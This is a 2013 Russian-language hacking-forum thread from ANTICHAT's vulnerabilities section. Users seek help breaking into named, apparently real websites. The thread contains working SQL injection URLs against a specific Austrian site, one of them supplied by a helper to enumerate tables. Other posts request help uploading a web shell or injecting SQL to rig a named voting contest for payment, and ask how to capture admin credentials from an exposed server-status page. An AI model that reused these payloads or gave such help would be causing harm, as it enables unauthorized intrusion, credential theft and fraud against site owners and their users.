HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22551  
Старый 30.06.2013, 20:57
wkuzy
Guest
Сообщений: n/a
Провел на форуме:
1793

Репутация: -5
По умолчанию

Всем привет!

Кто подскажет,есть сайт ......../wechselbude/index.php?page=content&name=info

Если сделать так ......../wechselbude/index.php?page=content&name=(SELECT%20CONCAT(versi on(),user(),database()))

то выводит version 5.1.66-nmm3-log

user d01333ce@localhost

db d01333ce

но дальше вообще никак ни через union ни через and,

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/w00db281/wechselbude/content/content.php on line 6
 
Ответить с цитированием

  #22552  
Старый 30.06.2013, 21:12
wkuzy
Guest
Сообщений: n/a
Провел на форуме:
1793

Репутация: -5
По умолчанию

Я с этими инклудами вообще не дружу
 
Ответить с цитированием

  #22553  
Старый 30.06.2013, 21:58
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

wkuzy,

Цитата:
Сообщение от None  
http://hammjue.at/wechselbude/index.php?page=content&name=((select table_name from information_schema.tables limit 1,1))
 
Ответить с цитированием

  #22554  
Старый 30.06.2013, 22:08
wkuzy
Guest
Сообщений: n/a
Провел на форуме:
1793

Репутация: -5
По умолчанию

Цитата:
Сообщение от trololoman96  
trololoman96 said:
wkuzy,
Спасибо ,дальше я сам
 
Ответить с цитированием

  #22555  
Старый 01.07.2013, 18:00
Kirka121
Guest
Сообщений: n/a
Провел на форуме:
726

Репутация: 0
По умолчанию

пытаюсь девочке помочь с хреновым контестом.

уверен что саит написан по левому.

кто поможет закачать шелл, или пробить SQL иньекцыю чтоб увеличить девочке колво votes?

саит; http://whowearsitbetter.com/2july.php

помогаю подруге и учусь уму разуму, помошь отблагадорю через paypal.
 
Ответить с цитированием

  #22556  
Старый 01.07.2013, 18:24
Kirka121
Guest
Сообщений: n/a
Провел на форуме:
726

Репутация: 0
По умолчанию

ты когда в послендии раз первыи пост етои темы читал?
 
Ответить с цитированием

  #22557  
Старый 01.07.2013, 23:44
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
HAXTA4OK said:
может быть все таки замена по регулярке идет
Я нашел проблему. В файле самого вп. В wp-includes/load.php есть такое:

Код:
Code:
// Escape with wpdb.
	$_GET    = add_magic_quotes( $_GET    );
	$_POST   = add_magic_quotes( $_POST   );
	$_COOKIE = add_magic_quotes( $_COOKIE );
	$_SERVER = add_magic_quotes( $_SERVER );

	// Force REQUEST to be GET + POST.
	$_REQUEST = array_merge( $_GET, $_POST );
и сам код функции add_magic_quotes

Код:
Code:
function add_magic_quotes( $array ) {
	foreach ( (array) $array as $k => $v ) {
		if ( is_array( $v ) ) {
			$array[$k] = add_magic_quotes( $v );
		} else {
			$array[$k] = addslashes( $v );
		}
	}
	return $array;
}
Эта фигня портит всю малину. Я так понимаю что тут уже ничего не сделать ?
 
Ответить с цитированием

  #22558  
Старый 03.07.2013, 09:44
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?
 
Ответить с цитированием

  #22559  
Старый 03.07.2013, 12:07
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?
Ты только адрес админ-панели максимум выловишь.

Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.

А так, максимум - адрес админ панели.
 
Ответить с цитированием

  #22560  
Старый 03.07.2013, 20:18
Voinmraka
Guest
Сообщений: n/a
Провел на форуме:
8952

Репутация: 0
По умолчанию

есть Phpmyadmin: 3.3.7deb7

можно ли на нем раскрыть пути? есть права рута
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ